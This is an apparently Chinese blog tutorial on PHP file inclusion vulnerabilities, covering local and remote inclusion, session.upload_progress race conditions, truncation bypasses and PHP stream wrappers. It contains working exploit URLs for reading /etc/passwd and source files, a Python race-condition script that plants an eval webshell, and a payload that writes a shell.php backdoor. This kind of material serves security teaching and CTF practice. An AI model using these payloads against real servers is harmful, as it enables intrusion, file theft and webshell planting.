WEB安全(文件包含)记一

原创 已于 2023-11-08 22:37:49 修改 · 245 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

于 2023-10-31 23:39:37 首次发布

前言

文件包含是指会在单个文件写入需要重复使用的函数,在需要使用的时候就直接调用此文件,这种文件调用的过程一般被称为文件包含。文件包含分为本地文件包含和远程文件包含,说明如下:

  • 当被包含的文件在服务器本地时,称为本地文件包含。
  • 当被包含的文件在第三方服务器时,称为远程文件包含。

文件包含漏洞

原因

由于开发人员没对文件名设置严格的规则,和其服务器上的没有过滤掉这些恶意文件,导致带有恶意代码的文件进入被包含进服务器中,从而形成了文件包含漏洞。

PHP中引发漏洞的函数

include(): 表达式包含并运行指定文件
include_once(): 表达式包含并运行指定重复运行的文件
require():
require_once(): PHP会检查该文件是否已经被包含过,如果是则不会再次包含

include() 函数在包含中出现错误,会警告一次,但是代码会继续运行,require() 函数它与 include 函数几乎一样,区别是它运行错误就会中止脚本。

漏洞分类

本地文件包含漏洞

类似代码

<?php
	$filename  = $_GET['filename'];
    include($filename);
?>

读取敏感信息

本地无限制读取,服务器没有过滤敏感信息。

Exp:

url/flie.php?filename=../../../../../../../etc/passwd

常见敏感信息路径:路径也可能因为版本的更新而更改

Windows系统路径作用
c:\boot.ini查看系统版本
c:\windows\system32\inetsrv\MetaBase.xmlIIS配置文件
c:\windows\repair\sam存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my.iniMySQL配置
c:\ProgramFiles\mysql\data\mysql\user.MYDMySQL root密码
windows系统php 配置信息
Linux/Unix系统路径作用
/etc/passwd账户信息
/etc/shadow账户密码文件
/usr/local/app/apache2/conf/httpd.confApache2默认配置文件
/etc/passwd // 账户信息虚拟网站配置
/usr/local/app/php5/lib/php.iniPHP相关配置
/etc/passwd // 账户信息Apache配置文件
/etc/my.confmysql 配置文件

Session漏洞利用

  • php中的session.upload_progress

前提:php版本 > php5.4

在php.ini中有几个默认选项

session.upload_progress.enabled = on
session.upload_progress.cleanup = on
session.upload_progress.prefix = "upload_progress_"
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
session.upload_progress.freq = "1%"
session.upload_progress.min_freq = "1"

session.use_strict_mode=off

详解配置

enabled=on表示upload_progress功能开始,也意味着当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中 ;
cleanup=on表示当文件上传结束后,php将会立即清空对应session文件中的内容,这个选项非常重要;
name当它出现在表单中,php将会报告上传进度,最大的好处是,它的值可控;
prefix+name将表示为session中的键名
session.use_strict_mode=off这个选项默认值为off,表示我们对Cookie中sessionid可控。

可以利用session.upload_progress将恶意语句写入session文件,从而包含session文件。前提需要知道session文件的存放位置。

  • 前提:session 的存储位置可以获取

通过phpinfo函数,读取session的存储位置,一般路径为:在session.save_path中有显示:

/var/lib/php/session
  • 条件竞争

举个例子

将包含漏洞的代码写入文件 session.php

<?php
	session_start();
	$ctfs=$_GET['ctfs'];
	$_SESSION["username"]=$ctfs;
?>

这个代码功能,通过 GET 将变量值读入到 session 中。

首先需要通过传入变量,查看 Cookies 中的 PHPSESSID 的值,其内容就是文件名。

url/session.php?ctfs=<?php phpinfo(); ?>

Exp:

url/flie.php?filename=../var/lib/php/session文件名

通过上面写入的恶意代码,你访问文件名就可以执行了。

问题一

如果没有session_start(),如何创建session文件

解答:

当session.auto_start=on时,PHP在接受到请求后初始化Session,不用执行session_start()。但是默认情况下,这个选项是不开启的。

但是session中存在一个默认选项,session.use_strict_mode=0。表示用户可以自定义session的ID,例如,设置Cookie里的PHPSESSION=FLAG,php就会在服务上创建一个文件:/tmp/sess_FLAG。虽然我们自己没有初始化,但是PHP也会自动初始化。并产生一个键值这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。

漏洞利用脚本

#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd":"system('whoami');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://127.0.0.1:5555/test56.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post('http://127.0.0.1:5555/test56.php?file=session/sess_'+sessid,data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in xrange(1,30): 
            threading.Thread(target=write,args=(session,)).start() 
    event.set()

绕过限制

%00截断

前提:php.inimagic_quotes_qpc=off并且PHP版本< 5.3.4的情况。

漏洞代码

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

它会在你访问的文件中加上 html ,但是你可以通过截断来绕过它。

Exp:

url/flie.php?filename=../../../../../../../etc/passwd%00
长度绕过

前提:在php代码包含中,这种绕过方式要求php版本 < php 5.2.8。

Windows下目录最大长度为256字节,超出的部分会被丢弃;

Linux下目录最大长度为4096字节,超出的部分会被丢弃。

漏洞代码

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

Exp:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
点号截断

Exp:

http://www.ctfs-wiki.com/FI/FI.php
?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
特殊符号

利用特色符号进行绕过,例如 ?、#、*、%20(空格)等

Exp:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt?

远程文件包含

服务器的PHP配置文件中allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件。如果没有对远程文件进行严格的过滤,从而执行恶意代码。

allow_url_fopen = On(是否允许打开远程文件)

allow_url_include = On(是否允许include/require远程文件)

漏洞代码

<?php
	$filename  = $_GET['filename'];
    include($filename);
?>

Exp:

url/flie.php?filename=http://192.168.91.133/FI/test.php%20

PHP伪协议文件包含

PHP是门强大的语言,所以PHP里面有许多已经封装好的协议,类似于库函数,是可以直接调用的,由于没有进行严格过滤,入侵者就可以利用这些协议完成恶意操作。可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

php://

php:// — 访问各个输入/输出流(I/O streams)
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://filter

这是一个访问本地文件的协议。

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 
这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 
在数据流内容读取之前没有机会应用其他过滤器。

php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。
名称描述
resource=<要过滤的数据流>这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(`
write=<写链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(`
<;两个链的筛选列表>任何没有以 read=write= 作前缀 的筛选器列表会视情况应用于读或写链。

漏洞代码:

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

Exp:

URL/?file=php://filter/convert.base64-encode/resource=flag.php

php://input

php://input 是个可以访问请求的原始数据的只读流。 
enctype="multipart/form-data" 的时候 php://input 是无效的。

用法:?file=php://input 数据利用POST传过去。

  • 读取POST数据

碰到file_get_contents()就要想到用php://input绕过,因为php伪协议也是可以利用http协议的,即可以使用POST方式传数据,具体函数意义下一项;

<?php
echo file_get_contents("php://input");
?>
  • 写入木马
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

前提:php配置文件中开启 allow_url_fopenallow_url_include(PHP < 5.3.0)

就是你POST过去的PHP代码会被执行

恶意代码

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

它会生成一个shell.php的一句话木马文件

  • 命令执行
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

前提:php配置文件中开启 allow_url_fopenallow_url_include(PHP < 5.3.0)

恶意代码

<?php system('whoami'); ?>

file://

读取本地文件中的内容

<?php
	$filename = $_GET['filename']
	include($filename);
?>

Exp:

/?file=file:///var/log/nginx/access.log

data://

data:数据流封装器。一般遇到 file_get_contents() 可以来用

用法:data://text/plain;base64,

<?php
// 打印 "I love PHP"
echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');
?>

注意:<span style="color: rgb(121, 121, 121);"><?php phpinfo();,这类执行代码最后没有?></span>闭合;

如果php.ini里的allow_url_include=On(PHP < 5.3.0),就可以造成任意代码执行

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

恶意代码

url/?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

phar://

这是 php 中用来解压打包文件的,不管后缀是什么。

用法:?file=phar: //压缩包/内部文件 phar://xxx.png/shell.php

注意: PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。

步骤: 写一个一句话木马文件shell.php,然后用zip协议压缩为shell.zip,然后将后缀改为png等其他格式。

Exp:

url/index.php?filename=phar://shell.png/shell.php

zip://

zip 伪协议和 phar 协议类似,但是用法不一样。

用法:?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。

前提: PHP > =5.3.0

注意:在windows下测试要5.3.0<PHP<5.4 才可以 # 在浏览器中要编码为%23,否则浏览器默认不会传输特殊字符。

Exp:

url/index.php?filename=zip://shell.png%23shell.php
web安全文件上传、文件包含漏洞解析
vivlol918的博客
05-14 1393
文件上传漏洞是指攻击者通过页面上传图片、文件等途径,将恶意脚本等文件上传到服务器上,从而控制服务器,实现攻击目的。
WEB安全——文件上传漏洞
m0_59947521的博客
02-20 2005
是指 Web 应用程序在处理文件上传功能时,存在安全缺陷,使得攻击者可以利用这些缺陷上传恶意文件,从而获取服务器的控制权或进行其他恶意操作。
Web文件包含
q
05-12 1172
包含的文件被当作当前的语言去代码执行漏洞原因:1.使用文件包含函数2.包含的文件可控分类:1.本地包含:​ 有文件利用:配合文件上传​ 无文件利用:​ 1.包含日志文件​ 2.包含session文件​ 3.伪协议利用2.远程包含:公网服务器自定义文件差异:代码过滤, allow_url_include配置开关白盒发现:包含函数黑盒发现:主要观察参数传递的数据和文件名是否对应。
基础漏洞——文件包含漏洞
2301_79096184的博客
09-16 2041
程序员对于多次使用的代码或数据,将其封装成个文件,使用include,require等函数进行包含调用。由于web应用对于用户输入的数据没有进行严格的过滤或没有进行过滤,导致用户输入的数据可以直接接触危险函数include,require等函数,从而使用户或攻击者的文件内容执行,使服务器沦陷。
大的php文件包含小网页的方式,【CTF题】使用文件包含漏洞读取网页代码
weixin_35726575的博客
03-11 201
【CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有index.php...
超详细本地文件包含漏洞详解(小白也能懂!)
weixin_39670937的博客
07-05 1817
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 8万+
1.文件包含漏洞概述和SQL注入等攻击方式样,文件包含漏洞也是种注入型漏洞,其本质就是输入段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
.net core WebApi 文件上传服务文件下载
11-23
.NET Core WebAPI中,构建个支持文件上传和下载的服务是项常见的需求。这涉及到处理HTTP请求,存储文件,以及提供安全的文件访问机制。本文将深入探讨如何在.NET Core WebAPI项目中实现这功能。 首先,我们...
shell脚本监控web站点目录下的文件安全
01-20
1. **监控Web站点目录文件安全**: - **文件大小变化**:文件大小的改变可能意味着文件内容被添加、删除或替换,这可能是恶意活动的迹象。 - **修改时间变化**:文件的修改时间更新可能表示文件已被编辑,需要...
WEB安全文件包含漏洞(2)
2301_81685556的博客
06-22 772
日志文件是用于录系统操作事件的录文件或文件集合,可分为事件日志和消息日志。具有处理历史数据、诊断问题的追踪以及理解系统的活动等重要作用。
buuctf web刷题笔
2301_78260987的博客
10-14 168
爆表:/check.php?参考链接:https://blog.csdn.net/m0_52923241/article/details/119641325。先试下常规注入:/check.php?
php-filter的进阶利用
unexpectedthing的博客
10-09 839
文章目录前言php://filterfilter绕过死亡die,死亡之exitphp://inputzip://,bzip2://,zlib://data协议总结 前言 本文重点是在php://filter协议中,其他协议只是回忆下 php://filter php://filter 是种元封装器, 设计用于数据流打开时的筛选过滤应用。这对于体式(all-in-one)的文件 函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有
java代码审计文件包含_代码审计--道简单的文件包含题目的多种利用方式
weixin_28689507的博客
03-02 642
不知出自哪次CTF前言:本萌新最近在学习代码审计,有天在水群聊到代码审计如何学习,然后某dalao丢给我道题,说你对这题有什么看法,本萌新看,这不是很简单吗,想也没多想就直接上去?file=flag.php,然后被dalao指教了番,于是就有了这篇文章。目录:NO.1 传统方法首先来看下代码error_reporting(0);if(@isset($_GET["file"])){inclu...
文件包含漏洞之本地文件包含
最新发布
2401_88614482的博客
07-17 323
文件包含漏洞(File Inclusion Vulnerability)是Web安全漏洞,攻击者通过操纵动态文件包含功能,使应用程序加载并执行非预期的文件(本地或远程)。这种漏洞通常出现在使用动态文件包含机制的Web应用程序中,如PHP的。3.利用文件包含,我们通过include函数来执行phpinfo.php页面,成功解析。攻击者可以读取或执行服务器上的任意文件(如配置文件、日志文件、源代码等)。包含PHP代码,服务器会执行它,导致RCE(远程代码执行)。在通过本地包含漏洞访问,即可执行。
THM学习笔——文件包含
jiangyu0_0的博客
01-18 1285
文件包含种常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的文件。文件包含漏洞分为本地文件包含 (LFI) 和远程文件包含 (RFI)两种类型。本地文件包含是通过浏览器包含web服务器上的文件,这种漏洞是因为浏览器包含文件时没有进行严格的过滤允许遍历目录的字符注入浏览器并执行。远程文件包含就是允许攻击者包含个远程的文件,般是在远程服务器上预先设置好的脚本。
文件包含学习笔总结
qq_58683895的博客
11-15 645
包含dvwa攻略,以及metinfo5.0.4和phpadmin的文件包含漏洞复现
文件包含常见用法与实际使用效果
weixin_71604403的博客
04-18 359
f=file:// 文件路径,这时候可以在文件路径前面加上../,将原来的文件路径改为敏感路径,然后直加../直到可以访问为止,如果加了很多../还是不能访问可以试着将../进行编码加密。条件:allow_url_fopen: off/on allow_url_include: off/on php 版本大于等于php5.3.0。条件:allow_url_fopen: off/on allow_url_include: off/on。php://filter(本地磁盘文件进行读取)
php://filter利用条件,浅谈php://filter技巧
weixin_33744799的博客
03-28 1252
php://filterphp://filter可以作为个中间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流必选read=可以设定个或多个过滤器名称,以管道符(|)分隔。可选write=可以设定个或多个过滤器名称,以管道符(|)分隔。可选任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。巧用编码与解码$content ...
文件包含漏洞
jpygx123的博客
10-25 4262
文件包含漏洞 严格来说,文件包含漏洞是“代码注入”的种,这种攻击其原理就是注入段用户能控制的脚本或代码,并让服务端执行。 常见的导致文件包含(文件读取)的函数如下: PHP: include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。 require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值